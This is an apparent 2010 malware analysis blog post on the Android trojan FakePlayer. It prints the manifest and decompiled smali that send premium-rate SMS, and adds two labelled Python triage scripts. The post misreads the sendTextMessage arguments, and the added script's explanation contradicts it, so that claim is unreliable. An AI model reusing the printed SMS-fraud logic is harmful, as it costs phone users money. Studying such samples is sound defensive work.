Analysis of Trojan-SMS.AndroidOS.FakePlayer.a

August 4, 2010 | Jaime Blasco

Trojan-SMS.AndroidOS.FakePlayer.a is one of the first malicious programs detected on Android smartphones.

The program camouflages itself as a media player application and begins sending SMS messages to premium-rate numbers without the user’s knowledge.

To analyze the Android .APK file we can use android-apktool (http://code.google.com/p/android-apktool/) to decode the application resources and study the program’s behaviour.

Let’s start decoding the resources with apktool:

pc201166154132:fakeplayer jaimeblasco$ apktool d RU.apk
I: Baksmaling…
I: Loading resource table…
I: Decoding resources…
I: Loading resource table from file: /Users/jaimeblasco/apktool/framework/1.apk
I: Copying assets and libs…

Apktool obtains the following files from the APK:

pc201166154132:fakeplayer jaimeblasco$ find ./
./
.//RU
.//RU/AndroidManifest.xml
.//RU/apktool.yml
.//RU/res
.//RU/res/drawable
.//RU/res/drawable/icon.png
.//RU/res/layout
.//RU/res/layout/main.xml
.//RU/res/values
.//RU/res/values/public.xml
.//RU/res/values/strings.xml
.//RU/smali
.//RU/smali/org
.//RU/smali/org/me
.//RU/smali/org/me/androidapplication1
.//RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali
.//RU/smali/org/me/androidapplication1/DataHelper.smali
.//RU/smali/org/me/androidapplication1/HelloWorld.smali
.//RU/smali/org/me/androidapplication1/MoviePlayer.smali
.//RU/smali/org/me/androidapplication1/R$attr.smali
.//RU/smali/org/me/androidapplication1/R$drawable.smali
.//RU/smali/org/me/androidapplication1/R$layout.smali
.//RU/smali/org/me/androidapplication1/R$string.smali
.//RU/smali/org/me/androidapplication1/R.smali

If we open RU/AndroidManifest.xml we can see that the application requests the permission android.permission.SEND_SMS when it is installed.



<?xml version="1.0" encoding="UTF-8"?>
<manifest package="org.me.androidapplication1"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:icon="@drawable/icon">
        <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
    <uses-permission android:name="android.permission.SEND_SMS" />
</manifest>
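Checking the manifest for permissions that can cost the user money is the first triage step on a sample like this. The following Python script is an added example, not code from the post or from AlienVault: it parses an apktool-decoded AndroidManifest.xml, lists the launcher activities and the requested permissions, and flags the ones in a small "costly" set. The manifest above is embedded as SAMPLE_MANIFEST so the script runs offline; the COSTLY_PERMISSIONS set is an assumption of this example, not an official Android list.

```python
# Added example (not from the original post): triage an apktool-decoded
# AndroidManifest.xml for launcher activities and costly permissions.
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# Permissions that let an app cost the user money or read their messages.
# This set is an assumption of the example, not an official Android list.
COSTLY_PERMISSIONS = {
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.CALL_PHONE",
}

# The FakePlayer manifest as decoded by apktool, embedded so this runs offline.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest package="org.me.androidapplication1"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <application android:icon="@drawable/icon">
        <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
    <uses-permission android:name="android.permission.SEND_SMS" />
</manifest>
"""


def requested_permissions(manifest_xml):
    """Return the set of android:name values of every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return {
        elem.get(NAME_ATTR)
        for elem in root.iter("uses-permission")
        if elem.get(NAME_ATTR)
    }


def triage_manifest(manifest_xml):
    """Summarise package name, launcher activities and costly permissions."""
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(manifest_xml)
    # Activities whose intent-filter carries the LAUNCHER category are the
    # ones the user sees in the app drawer; here "Movie Player" fronts the trojan.
    launchers = []
    for activity in root.iter("activity"):
        for category in activity.iter("category"):
            if category.get(NAME_ATTR) == "android.intent.category.LAUNCHER":
                launchers.append(activity.get(NAME_ATTR))
    return {
        "package": root.get("package"),
        "launcher_activities": launchers,
        "permissions": sorted(perms),
        "costly_permissions": sorted(perms & COSTLY_PERMISSIONS),
    }


if __name__ == "__main__":
    # Usage: python manifest_triage.py RU/AndroidManifest.xml
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    report = triage_manifest(xml_text)
    for key, value in report.items():
        print("%s: %s" % (key, value))
    if report["costly_permissions"]:
        print("WARNING: costly permissions requested: %s"
              % ", ".join(report["costly_permissions"]))
```

On the embedded manifest the report shows a single launcher activity, .MoviePlayer, and SEND_SMS as the only permission, which is the mismatch between what the app claims to be and what it can do that the post describes.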



We also observe that the application does some SQLite operations in RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali:



# static fields
.field private static final DATABASE_NAME:Ljava/lang/String; = "movieplayer.db"

.field private static final DATABASE_VERSION:I = 0x1

.field private static final INSERT:Ljava/lang/String; = "insert into table1(was) values (\'was\')"

.field private static final TABLE_NAME:Ljava/lang/String; = "table1"



The interesting operations can be found in RU/smali/org/me/androidapplication1/HelloWorld.smali:



    .line 28
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"

    .line 29
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"

    .line 31
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    .line 37
    :goto_0
    const-string v1, "3354"

    .line 39
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_1
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_1
    .catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_1



The application uses the sendTextMessage function from the Android API:

public final void sendTextMessage(String destinationAddress, String scAddress, String text, PendingIntent sentIntent, PendingIntent deliveryIntent)

So, the malicious program tries to send SMS messages to destination 798657 using the service center addresses (SMSC) 3353 and 3354.
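In an invoke-virtual/range call the first register in the range is the receiver (here v0, the SmsManager) and the remaining registers map onto the method's parameters in signature order, so the constant loaded into each register decides which parameter it becomes. The Python script below is an added example, not code from the post or from AlienVault: it walks a smali method body, remembers the last const-string or const load for each register, and at every call to SmsManager;->sendTextMessage reports the value that lands in each of the five parameters of the signature quoted above. The HelloWorld excerpt from the post is embedded as SAMPLE_SMALI so the script runs offline; the regular expressions and the straight-line register tracking are simplifications assumed by this example, not a general dataflow analysis.

```python
# Added example (not from the original post): recover the constant arguments
# passed to SmsManager.sendTextMessage() in a smali method body.
import re
import sys

# Parameter names of the Android API signature quoted in the post.
SIGNATURE = ("destinationAddress", "scAddress", "text", "sentIntent", "deliveryIntent")

# HelloWorld.smali excerpt from the post, embedded so the script runs offline.
SAMPLE_SMALI = r'''
    .line 28
    .local v0, m:Landroid/telephony/SmsManager;
    const-string v1, "3353"

    .line 29
    .local v1, destination:Ljava/lang/String;
    const-string v3, "798657"

    .line 31
    .local v3, text:Ljava/lang/String;
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    .line 37
    :goto_0
    const-string v1, "3354"

    .line 39
    const/4 v2, 0x0

    const/4 v4, 0x0

    const/4 v5, 0x0

    :try_start_1
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_1
    .catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_1
'''

CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+(v\d+),\s+"((?:[^"\\]|\\.)*)"')
CONST_SMALL = re.compile(r'^\s*const(?:/4|/16|/high16)?\s+(v\d+),\s+(-?0x[0-9a-fA-F]+|-?\d+)')
INVOKE_RANGE = re.compile(r'^\s*invoke-virtual/range\s+\{(v\d+)\s+\.\.\s+(v\d+)\},\s+(\S+)')
INVOKE_LIST = re.compile(r'^\s*invoke-virtual\s+\{([^}]*)\},\s+(\S+)')
SEND_TEXT = "Landroid/telephony/SmsManager;->sendTextMessage("


def find_sms_calls(smali):
    """Return one dict per sendTextMessage call: parameter name -> constant value.

    Straight-line scan only: a register keeps its last constant load, and a
    register set by anything else (or never set) is reported as None.
    """
    regs = {}
    calls = []
    for line in smali.splitlines():
        m = CONST_STRING.match(line)
        if m:
            regs[m.group(1)] = m.group(2).replace('\\"', '"')
            continue
        m = CONST_SMALL.match(line)
        if m:
            value = int(m.group(2), 0)
            regs[m.group(1)] = None if value == 0 else value  # 0 in an object register is null
            continue
        m = INVOKE_RANGE.match(line)
        if m:
            first, last, method = int(m.group(1)[1:]), int(m.group(2)[1:]), m.group(3)
            args = ["v%d" % n for n in range(first, last + 1)]
        else:
            m = INVOKE_LIST.match(line)
            if not m:
                continue
            args = [a.strip() for a in m.group(1).split(",")]
            method = m.group(2)
        if not method.startswith(SEND_TEXT):
            continue
        # The first register holds 'this'; the rest follow the Java signature.
        params = args[1:]
        calls.append({name: regs.get(reg) for name, reg in zip(SIGNATURE, params)})
    return calls


if __name__ == "__main__":
    # Usage: python sms_calls.py HelloWorld.smali
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SMALI
    for i, call in enumerate(find_sms_calls(text), 1):
        print("sendTextMessage #%d:" % i)
        for name in SIGNATURE:
            print("  %-18s %r" % (name, call[name]))
```

For the excerpt above the script reports two calls with v1 ("3353", then "3354") in destinationAddress, v2 (null) in scAddress and v3 ("798657") in text, the same register-to-parameter assignment the .local annotations in the dump record. Running it over every .smali file apktool produced is a quick way to enumerate all SMS-sending sites in a sample before reading the code by hand.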

As we can see, this is a very simple piece of malware with no spreading capabilities, and since it was never on the Android Market the risk is low.

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
